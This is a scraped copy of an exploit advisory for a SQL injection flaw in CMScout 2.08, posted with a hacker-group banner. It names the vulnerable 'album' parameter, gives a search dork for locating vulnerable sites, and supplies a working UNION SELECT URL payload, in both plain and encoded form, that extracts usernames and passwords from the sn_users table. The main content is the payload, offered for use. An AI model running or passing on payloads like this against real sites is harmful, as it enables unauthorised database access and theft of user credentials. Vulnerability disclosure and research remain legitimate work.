扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
# Title: CMScout 2.08 SQL Injection Vulnerability # EDB-ID: # CVE-ID: () # OSVDB-ID: () # Author: Dr.0rYX and Cr3w-DZ # Published: # Verified: # Download Exploit Code # Download N/A NNNNNNNNAAAAAASSSSSSSSTTTTTTTTTTTT NNNNNNNNNNAAAAAASSSSSSSSSSSSTTTTTTTTTTTT NNNNNNNNNNAAAAAAAASSSSTTTTeeeeeeaaaaaammmmmmmmmm NNNNNNNNNNNNAAAAAAAASSSSSSSSSSTTTTeeeeeeeeaaaaaaaammmmmmmmmmmmmmmm NNNNNNNNNNNNAAAAAAAASSSSSSSSTTTTeeeeeeeeeeaaaaaammmmmmmmmmmm NNNNNNNNNNAAAAAAAAAAAAAASSSSTTTTeeeeaaaaaaaammmmmmmmmmmm NNNNNNNNNNAAAAAAAAAAAAAASSSSSSSSSSSSTTTTeeeeeeeeeeaaaaaaaammmmmmmmmmmm NNNNNNNNAAAAAAAASSSSSSSSTTTTeeeeeeaaaaaaaaaammmmmmmmmmmm ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] Title :CMScout 2.08 SQL Injection Vulnerability [!] Author: Dr.0rYX and Cr3w-DZ [!] MAIL: vx3@hotmail.de&Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.cmscout.za.net/ [+] script : CMScout 2.08 [+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9 [+] Vulnerability : php SQL injection [+] Dork :Powered by CMScout (c)2005 CMScout Group **************************************************************************/ [ Vulnerable File ] http://server/index.php?page=photos&album=[N.A.S.T ] [ Exploit ] http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users-- [ Example] http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users-- [Greets ] [+] :CLAW , exploit-db.com,all my friends.... |
体验盒子
